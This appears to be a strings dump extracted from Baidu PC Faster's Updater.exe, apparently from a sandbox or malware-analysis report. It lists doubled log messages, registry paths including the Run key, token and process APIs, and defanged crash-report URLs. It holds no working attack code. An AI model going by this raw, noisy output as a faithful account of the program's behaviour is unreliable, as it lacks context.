COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
Updater.exe
Updater.exe
"%s" -no_ui
"%s" -no_ui
LookupPrivilegeValue error: %u
LookupPrivilegeValue error: %u
AdjustTokenPrivileges error: %u
AdjustTokenPrivileges error: %u
user name: %s, domain: %s
user name: %s, domain: %s
WTSEnumerateSessions failed, error code:%u
WTSEnumerateSessions failed, error code:%u
WTSEnumerateSessions OK, %u sessions
WTSEnumerateSessions OK, %u sessions
%dth session: %s, id:%d, state:%d
%dth session: %s, id:%d, state:%d
OnSessionLogon, session id: %d
OnSessionLogon, session id: %d
OnSessionLogoff, session id: %d
OnSessionLogoff, session id: %d
OnSessionConnect, session id: %d
OnSessionConnect, session id: %d
StartAppForUser: %s, thread id: %u
StartAppForUser: %s, thread id: %u
CreateEnvironmentBlock failed, error code: %u, thread id: %u
CreateEnvironmentBlock failed, error code: %u, thread id: %u
CreateProcessAsUser for %s is OK., thread id: %u
CreateProcessAsUser for %s is OK., thread id: %u
CreateProcessAsUser failed, error code: %u, thread id: %u
CreateProcessAsUser failed, error code: %u, thread id: %u
Enter StartAppForActiveUser, thread id: %u
Enter StartAppForActiveUser, thread id: %u
Before WTSQueryUserToken, thread id: %u
Before WTSQueryUserToken, thread id: %u
QueryUserToken failed, error code: %u, thread id: %u
QueryUserToken failed, error code: %u, thread id: %u
GetTokenInformation failed, error code: %u, thread id: %u
GetTokenInformation failed, error code: %u, thread id: %u
StartAppForActiveUser: %s, thread id: %u
StartAppForActiveUser: %s, thread id: %u
LogReporter.exe
LogReporter.exe
"%s" -show_ui -launch_uac_app %s
"%s" -show_ui -launch_uac_app %s
"%s" -launch_uac_app %s
"%s" -launch_uac_app %s
Leave StartAppForActiveUser, thread id: %u
Leave StartAppForActiveUser, thread id: %u
"%s" found, session id: %u, process id: %u
"%s" found, session id: %u, process id: %u
CreateEnvironmentBlock Failed: %u
CreateEnvironmentBlock Failed: %u
CreateProcessAsUser Failed, error code: %u
CreateProcessAsUser Failed, error code: %u
OnShutdown, thread id: %u
OnShutdown, thread id: %u
OnInit, thread id: %u
OnInit, thread id: %u
WTSEnumerateSessions failed, error code: %u
WTSEnumerateSessions failed, error code: %u
winlogon.exe
winlogon.exe
Process token open Error: %u
Process token open Error: %u
DuplicateTokenEx Error: %u
DuplicateTokenEx Error: %u
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
%s -bhips %d %d %d
%s -bhips %d %d %d
\PcfPopups.exe
\PcfPopups.exe
-ieprotectDlg %d %d "%s"
-ieprotectDlg %d %d "%s"
-homepageDlg %d "%s"
-homepageDlg %d "%s"
OnHipsMessage: Unknown dwMid: %d
OnHipsMessage: Unknown dwMid: %d
OnHipsMessage: %s
OnHipsMessage: %s
OnHipsMessage: returning result from cache: %d
OnHipsMessage: returning result from cache: %d
OnHipsMessage: returning result from temp cache: %d
OnHipsMessage: returning result from temp cache: %d
%s %s
%s %s
OnHipsMessage: CreateProcessForActiveUsers failed: %d
OnHipsMessage: CreateProcessForActiveUsers failed: %d
OnHipsMessage: popup result: %d
OnHipsMessage: popup result: %d
\BHips.dll
\BHips.dll
HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\services\PCFasterSvc_{PCFaster_4.0.0.0}
HKEY_LOCAL_MACHINE\SYSTEM\*ControlSet*\services\PCFasterSvc_{PCFaster_4.0.0.0}
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_CURRENT_USER\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu Security\PC Faster\4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Baidu PC Faster 4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Baidu PC Faster 4.0.0.0
Baidu PC Faster 4.0.0.0
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu_Drp_pos
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu_Drp_pos
BHips_RegisterCallback: %u(%s)
BHips_RegisterCallback: %u(%s)
FasterNow.exe
FasterNow.exe
EnableSelfProtection failed: (%X) %s
EnableSelfProtection failed: (%X) %s
ftex.exe
ftex.exe
DisbleSelfProtection failed: (%X) %s
DisbleSelfProtection failed: (%X) %s
LiveUpdate.exe
LiveUpdate.exe
PCFTray.exe
PCFTray.exe
PCFPopups.exe
PCFPopups.exe
PCFasterSvc.exe
PCFasterSvc.exe
SysOptEngineSvc.exe
SysOptEngineSvc.exe
SysAndNetworkOptSvc.exe
SysAndNetworkOptSvc.exe
SysRepairSvc.exe
SysRepairSvc.exe
PluginRemoverSvc.exe
PluginRemoverSvc.exe
LeakRepairSvc.exe
LeakRepairSvc.exe
LeakRepair.exe
LeakRepair.exe
CleanerEngineSvc.exe
CleanerEngineSvc.exe
CreateWindow failed: %s
CreateWindow failed: %s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::Open, m_mapRegKey.find(%s)
CMyRegKeyBase::EqualType, m_mapRegType.find(%s)
CMyRegKeyBase::EqualType, m_mapRegType.find(%s)
CMsgRouteMgr::InitMgr : Load Component %s
CMsgRouteMgr::InitMgr : Load Component %s
Global\{D1832A89-8FD1-8e20-A871-578A717C7536}_{PCFaster_4.0.0.0}
Global\{D1832A89-8FD1-8e20-A871-578A717C7536}_{PCFaster_4.0.0.0}
CMsgRouteMgr::InitMgr : InitIPCServer
CMsgRouteMgr::InitMgr : InitIPCServer
Svc.exe
Svc.exe
PluginConfig.xml
PluginConfig.xml
PluginConfig.xml
PluginConfig.xml
Unload component: %s
Unload component: %s
Load component %s successfully!
Load component %s successfully!
Can not unload component %s because the done function returns EXEC_ERROR!
Can not unload component %s because the done function returns EXEC_ERROR!
Force to unload component %s even done function returns EXEC_ERROR!
Force to unload component %s even done function returns EXEC_ERROR!
CMsgRouteMgr::QueryInterface :
CMsgRouteMgr::QueryInterface :
CMsgRouteMgr::DispatchMsg :
CMsgRouteMgr::DispatchMsg :
strCMDID
strCMDID
CMsgRouteMgr::QueryInfByCmdID :
CMsgRouteMgr::QueryInfByCmdID :
bd_krn_ui_D3152864-5AFF-42e3-9FB2-99ABF218961_{PCFaster_4.0.0.0}
bd_krn_ui_D3152864-5AFF-42e3-9FB2-99ABF218961_{PCFaster_4.0.0.0}
%s.dll
%s.dll
CMsgRouteMgr::DoWork
CMsgRouteMgr::DoWork
DumpReportInterval
DumpReportInterval
-send_uu_msg
-send_uu_msg
-no_ui -send_uu_msg
-no_ui -send_uu_msg
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\Statistic
SOFTWARE\Baidu Security\PC Faster\4.0.0.0\Statistic
UpLoadReportErrorDmp
UpLoadReportErrorDmp
PCFHelper.exe
PCFHelper.exe
-svc_dowork=%d
-svc_dowork=%d
com_ui_shellexecute
com_ui_shellexecute
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Receive unknown init msg
Receive unknown init msg
Send kernel response to process: %s error!
Send kernel response to process: %s error!
Global\BDKERNELPROTECTOR_{PCFaster_4.0.0.0}
Global\BDKERNELPROTECTOR_{PCFaster_4.0.0.0}
Baidu PC Faster 5.0.0.0
Baidu PC Faster 5.0.0.0
Baidu PC Faster Service 4.0.0.0
Baidu PC Faster Service 4.0.0.0
PCFasterSvc_{PCFaster_4.0.0.0}
PCFasterSvc_{PCFaster_4.0.0.0}
%u.u.u.u
%u.u.u.u
version.xml
version.xml
Uninstall.exe
Uninstall.exe
ReportURL
ReportURL
DataReport
DataReport
%u.%u.%u.%u
%u.%u.%u.%u
Bexplorer.exe
Bexplorer.exe
COMM_FUNC::GetExplorerToken: explorer.exe found!
COMM_FUNC::GetExplorerToken: explorer.exe found!
COMM_FUNC::GetExplorerToken: OpenProcess failed: %d
COMM_FUNC::GetExplorerToken: OpenProcess failed: %d
COMM_FUNC::GetExplorerToken: OpenProcessToken failed: %d
COMM_FUNC::GetExplorerToken: OpenProcessToken failed: %d
CHelper::RunExeInSvc, CreateProcess(%s), pi.hProcess=%u
CHelper::RunExeInSvc, CreateProcess(%s), pi.hProcess=%u
@[ServerBackground] PIPEINST
@[ServerBackground] PIPEINST
[ServerBackground] PIPEINST
[ServerBackground] PIPEINST
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SysOptEngineSvc.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SysOptEngineSvc.exe
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
%Program Files%\Baidu Security\PC Faster\5.0.0.0\
5.0.4.87531
5.0.4.87531
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump
5.1.2600.5512 (xpsp.080413-211
5.1.2600.5512 (xpsp.080413-211
5,0,4,87456
5,0,4,87456
Updater.exe_2444:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
vSSSh
vSSSh
FTPjK
FTPjK
FtPj;
FtPj;
C.PjRV
C.PjRV
tGHt.Ht&
tGHt.Ht&
CNotSupportedException
CNotSupportedException
hhctrl.ocx
hhctrl.ocx
CCmdTarget
CCmdTarget
Please contact the application's support team for more information.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
portuguese-brazilian
portuguese-brazilian
operator
operator
%s$x$x
%s$x$x
%s$%x
%s$%x
-60%!<:>
-60%!<:>
$x
$x
;3:'84!<:>
;3:'84!<:>
mscoree.dll
mscoree.dll
coredll.dll
coredll.dll
6666666666666666
6666666666666666
NOLEACC.dll
NOLEACC.dll
xml=hXXp://VVV.w3.org/XML/1998/namespace
xml=hXXp://VVV.w3.org/XML/1998/namespace
Memory operation in %S, line %d: %s a %d-byte '%s' block (# %ld)
Memory operation in %S, line %d: %s a %d-byte '%s' block (# %ld)
errmsg_exceptionW
errmsg_exceptionW
varerrmsg_exceptionW
varerrmsg_exceptionW
CHttpToolW::Unicode2Ansi: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::Unicode2Ansi: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::Ansi2Unicode: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::Ansi2Unicode: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::OpenConnection: hInternet can not be NULL.
CHttpToolW::OpenConnection: hInternet can not be NULL.
CHttpToolW::OpenConnection: szServerAddr can not be NULL.
CHttpToolW::OpenConnection: szServerAddr can not be NULL.
CHttpToolW::OpenConnection: szServerAddr can not be an empty string.
CHttpToolW::OpenConnection: szServerAddr can not be an empty string.
CHttpToolW::OpenRequest: hConnection can not be NULL.
CHttpToolW::OpenRequest: hConnection can not be NULL.
CHttpToolW::OpenRequest: szObjectName can not be NULL.
CHttpToolW::OpenRequest: szObjectName can not be NULL.
CHttpToolW::OpenRequest: szObjectName can not be an empty string.
CHttpToolW::OpenRequest: szObjectName can not be an empty string.
CHttpToolW::OpenRequest: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::OpenRequest: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::AddHeader: hRequest can not be NULL.
CHttpToolW::AddHeader: hRequest can not be NULL.
CHttpToolW::AddHeader: szName can not be NULL.
CHttpToolW::AddHeader: szName can not be NULL.
CHttpToolW::SendRequest: hRequest can not be NULL.
CHttpToolW::SendRequest: hRequest can not be NULL.
CHttpToolW::SendRequest: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::SendRequest: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::InternetWriteFile: hRequest can not be NULL.
CHttpToolW::InternetWriteFile: hRequest can not be NULL.
CHttpToolW::InternetWriteFile: pbyBuff can not be NULL.
CHttpToolW::InternetWriteFile: pbyBuff can not be NULL.
CHttpToolW::InternetWriteFile: cbyBuff can not be zero.
CHttpToolW::InternetWriteFile: cbyBuff can not be zero.
CHttpToolW::EndRequest: hRequest can not be NULL.
CHttpToolW::EndRequest: hRequest can not be NULL.
CHttpToolW::FileExists: szFilePath can not be NULL.
CHttpToolW::FileExists: szFilePath can not be NULL.
CHttpToolW::OpenFile: szFilePath can not be NULL.
CHttpToolW::OpenFile: szFilePath can not be NULL.
CHttpToolW::CreateFileAlwaysToWrite: szFilePath can not be NULL.
CHttpToolW::CreateFileAlwaysToWrite: szFilePath can not be NULL.
CHttpToolW::GetFileSize: hFile can not be NULL.
CHttpToolW::GetFileSize: hFile can not be NULL.
CHttpToolW::GetFileSize: szFilePath can not be NULL.
CHttpToolW::GetFileSize: szFilePath can not be NULL.
CHttpToolW::GetMimeType: hFile can not be NULL.
CHttpToolW::GetMimeType: hFile can not be NULL.
CHttpToolW::GetHeader: hRequest can not be NULL.
CHttpToolW::GetHeader: hRequest can not be NULL.
CHttpToolW::GetMimeType: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::GetMimeType: CP_UTF8 and CP_UTF7 can not be used for the CodePage parameter.
CHttpToolW::GetStatusText: hRequest can not be NULL.
CHttpToolW::GetStatusText: hRequest can not be NULL.
CHttpToolW::GetHeader: szName can not be NULL.
CHttpToolW::GetHeader: szName can not be NULL.
CReportManager::FindBody
CReportManager::FindBody
CReportManager::GetAllFiles
CReportManager::GetAllFiles
CReportManager::StartUploadFile
CReportManager::StartUploadFile
RD_ReportValueEx
RD_ReportValueEx
Thread %d: invalid start address X!!!
Thread %d: invalid start address X!!!
%d: BaseThreadStart = X
%d: BaseThreadStart = X
kernel32.dll
kernel32.dll
CMyRegKeyBase::Open
CMyRegKeyBase::Open
CMyRegKeyBase::EqualType
CMyRegKeyBase::EqualType
SendUserMsg
SendUserMsg
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
00000000
00000000
CUpdatorApp::OnUpdateMsg
CUpdatorApp::OnUpdateMsg
CUpdateMan::wait_exe_quit
CUpdateMan::wait_exe_quit
CUpdateMan::wait_must_wait_exe_quit
CUpdateMan::wait_must_wait_exe_quit
CUpdateMan::kill_bav_exes
CUpdateMan::kill_bav_exes
CUpdateMan::start_bav_exe_as_active_user
CUpdateMan::start_bav_exe_as_active_user
CUpdateMan::my_shell_execute
CUpdateMan::my_shell_execute
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
-1.1.3
1.1.3
1.1.3
CHttpPost::CrackUrl
CHttpPost::CrackUrl
CHttpPost::RecvData
CHttpPost::RecvData
CHttpPost::PostText
CHttpPost::PostText
CHttpDownloader::AddDownloadTask
CHttpDownloader::AddDownloadTask
CHttpDownloader::DoWork
CHttpDownloader::DoWork
CHttpDownloader::DisplayError
CHttpDownloader::DisplayError
CHttpDownloader::RecvData
CHttpDownloader::RecvData
CHttpDownloader::DownloadFile
CHttpDownloader::DownloadFile
CHttpDownloader::RequestGet
CHttpDownloader::RequestGet
CHttpDownloader::CrackUrl
CHttpDownloader::CrackUrl
CHttpDownloader::ConstructUrl
CHttpDownloader::ConstructUrl
CDownloadDlg::OnDownloadMsg
CDownloadDlg::OnDownloadMsg
COMM_FUNC::EnumProcess_GetExplorerToken::operator ()
COMM_FUNC::EnumProcess_GetExplorerToken::operator ()
CCommunication::OpenURL
CCommunication::OpenURL
RegDeleteKeyExW
RegDeleteKeyExW
httpclientexceptionW
httpclientexceptionW
SYN.ACK
SYN.ACK
ACK.SYN
ACK.SYN
XXX
XXX
s:\app\gensoft\security-client\pc-faster\public\output\pdb\Updater.pdb
s:\app\gensoft\security-client\pc-faster\public\output\pdb\Updater.pdb
log.dll
log.dll
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
KERNEL32.dll
KERNEL32.dll
CreateDialogIndirectParamW
CreateDialogIndirectParamW
GetKeyState
GetKeyState
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyW
RegEnumKeyW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegOpenKeyW
RegOpenKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExW
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
SHELL32.dll
SHELL32.dll
COMCTL32.dll
COMCTL32.dll
SHLWAPI.dll
SHLWAPI.dll
oledlg.dll
oledlg.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
VERSION.dll
VERSION.dll
WTSAPI32.dll
WTSAPI32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
RPCRT4.dll
RPCRT4.dll
WinHttpOpen
WinHttpOpen
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetOption
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReceiveResponse
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpConnect
WinHttpReadData
WinHttpReadData
WinHttpCreateUrl
WinHttpCreateUrl
WinHttpWriteData
WinHttpWriteData
WinHttpSetCredentials
WinHttpSetCredentials
WINHTTP.dll
WINHTTP.dll
USERENV.dll
USERENV.dll
PSAPI.DLL
PSAPI.DLL
WS2_32.dll
WS2_32.dll
.PAVCOleException@@
.PAVCOleException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCFileException@@
.PAVCFileException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
zcÃ
zcÃ
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
.?AVBugReportHelper@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCRegKey@ATL@@
.?AVCRegKey@ATL@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKeyBase@@
.?AVCMyRegKey64@@
.?AVCMyRegKey64@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
unexpected parser state - please send a bug report
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
requested feature requires XML_DTD support in Expat
expat_1.95.8
expat_1.95.8
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.?AVCMyRegKey32@@
.?AVCMyRegKey32@@
.?AVCAutoRegCloseKey@@
.?AVCAutoRegCloseKey@@
.?AVCTaskParam2@?$CTaskMgrTmpl@VCReportManager@@@@
.?AVCTaskParam2@?$CTaskMgrTmpl@VCReportManager@@@@
.?AV?$CTaskMgrTmpl@VCReportManager@@@@
.?AV?$CTaskMgrTmpl@VCReportManager@@@@
.?AVhttpclientexceptionW@Ryeol@@
.?AVhttpclientexceptionW@Ryeol@@
.?AV?$CHttpClientT@VCHttpToolW@Ryeol@@VCHttpEncoderW@2@@Ryeol@@
.?AV?$CHttpClientT@VCHttpToolW@Ryeol@@VCHttpEncoderW@2@@Ryeol@@
.?AV?$CHttpPostStatT@VCHttpToolW@Ryeol@@@Ryeol@@
.?AV?$CHttpPostStatT@VCHttpToolW@Ryeol@@@Ryeol@@
.?AV?$CHttpResponseT@VCHttpToolW@Ryeol@@@Ryeol@@
.?AV?$CHttpResponseT@VCHttpToolW@Ryeol@@@Ryeol@@
.?AV?$CHttpClientMapT@VCHttpToolW@Ryeol@@@Ryeol@@
.?AV?$CHttpClientMapT@VCHttpToolW@Ryeol@@@Ryeol@@
.?AVerrmsg_exceptionW@Ryeol@@
.?AVerrmsg_exceptionW@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
.?AVhttpclientexceptionA@Ryeol@@
.?AVCMD5Checksum@@
.?AVCMD5Checksum@@
2)2U2^2d2
2)2U2^2d2
7Â8Y8w8
7Â8Y8w8
3>4&565[5
3>4&565[5
364C4
364C4
> >;>]>}>
> >;>]>}>
7 7$7(7,70747~7
7 7$7(7,70747~7
9 9$9(9,9
9 9$9(9,9
2%2*292`2
2%2*292`2
8 8)8
8 8)8
1 1$1(161;1
1 1$1(161;1
9 :$:(:,:0:4:8:<:>
9 :$:(:,:0:4:8:<:>
>(>,>0>4>8>@>
>(>,>0>4>8>@>
9 9$9(9,909
9 9$9(9,909
2"3)3&5-5
2"3)3&5-5
0 0$0(0,0004080
0 0$0(0,0004080
> >$>(>,>0>??
> >$>(>,>0>??
2(2-2k2x2}2
2(2-2k2x2}2
3 3,323:3
3 3,323:3
:0[0!112
:0[0!112
= =$=(=,=0=4=8=
= =$=(=,=0=4=8=
? ?$?(?,?0?4?8?
? ?$?(?,?0?4?8?
= =@=`=|=
= =@=`=|=
B%s (%s:%d)
B%s (%s:%d)
%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
accKeyboardShortcut
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
commctrl_DragListMsg
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
ntdll.dll
%s%s.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
mfcm90u.dll
mfcm90u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Ecomctl32.dll
Ecomctl32.dll
Ecomdlg32.dll
Ecomdlg32.dll
Eshell32.dll
Eshell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
O.INI
O.INI
KERNEL32.DLL
KERNEL32.DLL
explorer.exe
explorer.exe
HTTP/1.1
HTTP/1.1
BugReportConfig.ini
BugReportConfig.ini
ShowBugReport
ShowBugReport
DumpConfig.ini
DumpConfig.ini
_ServerStore.dat
_ServerStore.dat
hXXp://
hXXp://
product=%s;guid=%s;type=%d;
product=%s;guid=%s;type=%d;
/cgi-bin-py/dump_controler.cgi
/cgi-bin-py/dump_controler.cgi
CrashUL.exe
CrashUL.exe
trayreported
trayreported
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
/Start:%s /Program:%s /Path:%s /Version:%s /Module:%s /App:%s /ID:%s /Email:%s /DumpPath:%s
serverreported
serverreported
\StringFileInfo\xx\%s
\StringFileInfo\xx\%s
BugReportConfig
BugReportConfig
BugInfoUploadURL
BugInfoUploadURL
hXXp://sync.bav.baidu.com
hXXp://sync.bav.baidu.com
BugURL
BugURL
hXXp://bug.bav.baidu.com
hXXp://bug.bav.baidu.com
Baidu Crash Report
Baidu Crash Report
CrashCallBackExe
CrashCallBackExe
c:\crash.ini
c:\crash.ini
CrashReport.exe
CrashReport.exe
PatchExportTable
PatchExportTable
HPatchMyImportTables
HPatchMyImportTables
%S$%x
%S$%x
public %s
public %s
sub_%0X
sub_%0X
%sloc_%0X
%sloc_%0X
loc_%0X:
loc_%0X:
\StringFileInfo\x\%s
\StringFileInfo\x\%s
\StringFileInfo\X
\StringFileInfo\X
push %seg
push %seg
pop %seg
pop %seg
setÌ
setÌ
cmovÌ
cmovÌ
66006666
66006666
xmm%d
xmm%d
st(%d)
st(%d)
%s (%0Xh)
%s (%0Xh)
%0Xh
%0Xh
-%0Xh
-%0Xh
%s:%s
%s:%s
%0Xh:%0Xh
%0Xh:%0Xh
%0Xh, %0Xh
%0Xh, %0Xh
BAD ptr %s
BAD ptr %s
oword ptr %s
oword ptr %s
tbyte ptr %s
tbyte ptr %s
qword ptr %s
qword ptr %s
dword ptr %s
dword ptr %s
word ptr %s
word ptr %s
byte ptr %s
byte ptr %s
user_plugin_chrome_list
user_plugin_chrome_list
user_plugin_firefox_list
user_plugin_firefox_list
dir.ini
dir.ini
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, user_info::UniqueUserID::GetActiveDesktopToken()=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetFolderPath(%d)=%u
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
COMM_FUNC::GetAppDataDir, SHGetSpecialFolderPath(%d)
\Baidu Security\PC Faster\4.0.0.0
\Baidu Security\PC Faster\4.0.0.0
url.ini
url.ini
%d:%d,%d:%d
%d:%d,%d:%d
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
PCFaster.exe
PCFaster.exe
\sysconfig.ini
\sysconfig.ini
config.ini
config.ini
MainExeName
MainExeName
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
C:\Users\Public\Documents\Baidu Security\PC Faster\4.0.0.0
"%s" %s
"%s" %s
Sensapi.dll
Sensapi.dll
:::%d
:::%d
Send SaveInternal Failed, getlasterror = %d
Send SaveInternal Failed, getlasterror = %d
rpFile-%s-d-d-d d-d-d-d-[d].tmp
rpFile-%s-d-d-d d-d-d-d-[d].tmp
0.0.0.0
0.0.0.0
The requested URL is not a valid URL.
The requested URL is not a valid URL.
The port number is not valid.
The port number is not valid.
The encoded URL is not valid.
The encoded URL is not valid.
The file (%s) aleady exists.
The file (%s) aleady exists.
::HttpQueryInfo failed.
::HttpQueryInfo failed.
::HttpOpenRequest failed.
::HttpOpenRequest failed.
::HttpAddRequestHeaders failed.
::HttpAddRequestHeaders failed.
::HttpSendRequest failed.
::HttpSendRequest failed.
::HttpSendRequestEx failed.
::HttpSendRequestEx failed.
::HttpEndRequest failed.
::HttpEndRequest failed.
OpenFile (::CreateFile) failed ("%s").
OpenFile (::CreateFile) failed ("%s").
